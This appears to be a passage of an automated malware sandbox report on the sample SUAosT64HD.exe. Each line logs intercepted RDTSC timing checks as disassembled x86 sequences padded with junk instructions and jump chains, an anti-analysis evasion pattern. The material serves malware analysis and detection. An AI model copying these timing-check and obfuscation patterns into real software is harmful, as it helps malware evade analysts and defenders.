Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EF104 second address: 6EF108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EDCB8 second address: 6EDCC2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC3507E537Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EDCC2 second address: 6EDCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC350C3E71Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EDE9D second address: 6EDEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC3507E5382h 0x0000000c jnp 00007FC3507E537Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE01F second address: 6EE071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FC350C3E729h 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FC350C3E723h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC350C3E729h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE385 second address: 6EE38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE939 second address: 6EE94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnl 00007FC350C3E720h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EE94E second address: 6EE95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC3507E5376h 0x0000000a jp 00007FC3507E5376h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6EEAB9 second address: 6EEAEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ch 0x00000007 jbe 00007FC350C3E722h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC350C3E722h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F24A3 second address: 6F24D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC3507E5382h 0x0000000e jmp 00007FC3507E5389h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F24D9 second address: 6F2505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FC350C3E724h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC350C3E71Dh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2505 second address: 6F250B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7098 second address: 6B709C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B709C second address: 6B70A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B70A2 second address: 6B70C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC350C3E71Ch 0x00000008 js 00007FC350C3E716h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC350C3E718h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B70C5 second address: 6B70D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B70D7 second address: 6B7119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov cx, DCF2h 0x0000000d lea eax, dword ptr [ebp+1247BDA4h] 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC350C3E718h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, 6A21E9ECh 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7119 second address: 6B711D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B711D second address: 6B7127 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7127 second address: 6A1C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC3507E5378h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push ecx 0x00000025 mov edx, dword ptr [ebp+122D3A49h] 0x0000002b pop edx 0x0000002c call dword ptr [ebp+1245BB4Ch] 0x00000032 pushad 0x00000033 jmp 00007FC3507E5386h 0x00000038 push ebx 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7522 second address: 6B7528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7639 second address: 6B7672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FC3507E5387h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7672 second address: 6B767C instructions: 0x00000000 rdtsc 0x00000002 js 00007FC350C3E71Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7724 second address: 6B776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FC3507E5382h 0x0000000b jmp 00007FC3507E537Ch 0x00000010 popad 0x00000011 add dword ptr [esp], 78EEC7CAh 0x00000018 mov di, 1200h 0x0000001c call 00007FC3507E5379h 0x00000021 je 00007FC3507E5394h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC3507E5382h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B776A second address: 6B778F instructions: 0x00000000 rdtsc 0x00000002 je 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC350C3E728h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B778F second address: 6B77AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5388h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B77AB second address: 6B77D1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jo 00007FC350C3E720h 0x00000016 pushad 0x00000017 jnc 00007FC350C3E716h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7908 second address: 6B7925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC3507E5385h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A57 second address: 6B7A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E724h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A79 second address: 6B7A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A7D second address: 6B7A83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7A83 second address: 6B7AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC3507E5382h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7AB2 second address: 6B7AD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FC350C3E724h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7AD5 second address: 6B7ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7B64 second address: 6B7B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7CB7 second address: 6B7CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC3507E5376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7CC1 second address: 6B7CD7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007FC350C3E71Eh 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B7CD7 second address: 6B7D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FC3507E5378h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov edx, dword ptr [ebp+122D3825h] 0x00000026 push 00000004h 0x00000028 sub cx, 9BF0h 0x0000002d nop 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC3507E537Fh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8108 second address: 6B810C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B810C second address: 6B8141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+12478FDCh], ecx 0x0000000e mov dword ptr [ebp+122D2151h], edx 0x00000014 push 0000001Eh 0x00000016 call 00007FC3507E5380h 0x0000001b movsx edx, bx 0x0000001e pop edi 0x0000001f push eax 0x00000020 jl 00007FC3507E5384h 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8141 second address: 6B8145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8248 second address: 6B824D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B83AC second address: 6B83E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007FC350C3E723h 0x0000000c pop ebx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 jmp 00007FC350C3E71Ch 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B83E1 second address: 6B83F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B84CB second address: 6B84D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B84D1 second address: 6B8545 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FC3507E5382h 0x00000010 lea eax, dword ptr [ebp+1247BDE8h] 0x00000016 jmp 00007FC3507E5381h 0x0000001b nop 0x0000001c jnc 00007FC3507E537Eh 0x00000022 push eax 0x00000023 jc 00007FC3507E5384h 0x00000029 jmp 00007FC3507E537Eh 0x0000002e nop 0x0000002f mov edx, dword ptr [ebp+122D2A33h] 0x00000035 lea eax, dword ptr [ebp+1247BDA4h] 0x0000003b jc 00007FC3507E5378h 0x00000041 mov ecx, esi 0x00000043 nop 0x00000044 pushad 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8545 second address: 6A2717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC350C3E71Dh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FC350C3E725h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jne 00007FC350C3E716h 0x0000001f popad 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007FC350C3E718h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c sub dword ptr [ebp+12470066h], ebx 0x00000042 call dword ptr [ebp+122D34EFh] 0x00000048 pushad 0x00000049 push eax 0x0000004a jmp 00007FC350C3E71Bh 0x0000004f pop eax 0x00000050 jmp 00007FC350C3E726h 0x00000055 push eax 0x00000056 push edx 0x00000057 jng 00007FC350C3E716h 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2744 second address: 6F2749 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2749 second address: 6F2763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E71Dh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC350C3E716h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F28F6 second address: 6F28FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F28FA second address: 6F2902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2902 second address: 6F2908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2908 second address: 6F2923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Eh 0x00000007 jp 00007FC350C3E716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C28 second address: 6F2C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC3507E5376h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C34 second address: 6F2C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C38 second address: 6F2C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3507E5386h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C5C second address: 6F2C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C60 second address: 6F2C6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FC3507E5376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C6A second address: 6F2C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C75 second address: 6F2C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2C7D second address: 6F2C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F2EE8 second address: 6F2EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F305D second address: 6F306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F306B second address: 6F3081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F8EAE second address: 6F8EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC350C3E71Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F788E second address: 6F7897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F7897 second address: 6F78B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC350C3E71Eh 0x0000000c jc 00007FC350C3E716h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F78B2 second address: 6F78B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F7B93 second address: 6F7B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F7E28 second address: 6F7E34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F83DA second address: 6F83DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F83DF second address: 6F83E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F8533 second address: 6F8537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F86D6 second address: 6F86DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F86DC second address: 6F870E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC350C3E726h 0x0000000b jbe 00007FC350C3E716h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jc 00007FC350C3E716h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F8876 second address: 6F887E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6F887E second address: 6F8898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E720h 0x00000009 jo 00007FC350C3E716h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E70 second address: 702E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E76 second address: 702E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E7A second address: 702E8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FC3507E5376h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 702E8B second address: 702E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC350C3E71Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
